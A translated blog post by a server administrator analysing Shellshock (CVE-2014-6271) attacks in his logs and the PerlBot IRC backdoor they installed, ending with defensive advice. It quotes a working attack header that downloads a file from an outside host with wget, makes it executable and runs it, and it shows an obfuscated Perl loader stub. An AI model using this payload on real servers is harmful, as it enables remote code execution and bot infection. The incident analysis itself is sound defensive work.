Start active ShellShock application

image

Good day% username%! I want to tell a story about how my server is attacked every day through CVE-2014-6271 (shellshock). For those who suddenly overlooked this, two publications on Habré: “CVE-2014-6271, CVE-2014-7169: remote code execution in Bash” and “New dangerous ShellShock vulnerability allow attacking many devices, from smartphones to industrial servers . "

So, after the information got into public access, in the server logs I began to see requests to the server, where the headers contained a bash call. At first, these were harmless requests, where the referer and UserAgent http requests contained a call from bash ping xxx.xxx.xxx.xxx - you can guess that this is already a search for potential victims.

Tonight, things got a lot more interesting. Checking the server logs, I came across this request:

...
UserAgent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.YYY.YYY.YY/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
...
(Using wget, download the file from the remote server, set the execution rights, start, delete).
(IP address is specially erased).

Obviously, the matter is about mass infection of servers with bots.

Well, download this file, it turned out to be a perl script. Having run it through virustotal we see only one operation:

Sophos - Mal / PerlBot-A

The others say that everything is OK.

Well, let's see. Opening the file in a text editor, we see: Everything is immediately clear, a typical method of hiding the code. Well, decode base64 and get the following:

#!/usr/bin/perl
use MIME::Base64;
eval(decode_base64(('IyEvdXNyL2Jpbi9wZXJsDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj ..... MjIyMjIyMjIyMNCg=='));)




## много комментариев
## perlBot v1.02012 By unknown @unknown ## [ Help ] ####################################
## много комментариев


Now everything is clear. Another backdoor for remote control. Managed via IRC. I am not very familiar with perl, but having run through the file it is noticeable that it includes raising rights (through the selection of the root password, the dictionary is quite small), flood, and launching some utilities (mail, portscan, raising dns).

In conclusion, I would like to give advice to novice system administrators.

Watch your wards! If you think that bash is not involved in your systems, you can make a big mistake.

Bash is used in Apache (mod_cgi, mod_cgid), DHCP clients, OpenSSH, as well as Git, Subversion, and of course, your router can also be vulnerable.

On github there are a lot of public repositories for attacks, except that exploiting this vulnerability is so easy that any novice pest can handle it.

Related Links


Information about PerlBot (modification) [EN] ;
DigitalOcean article on how to defend against Shellshock .

Also popular now: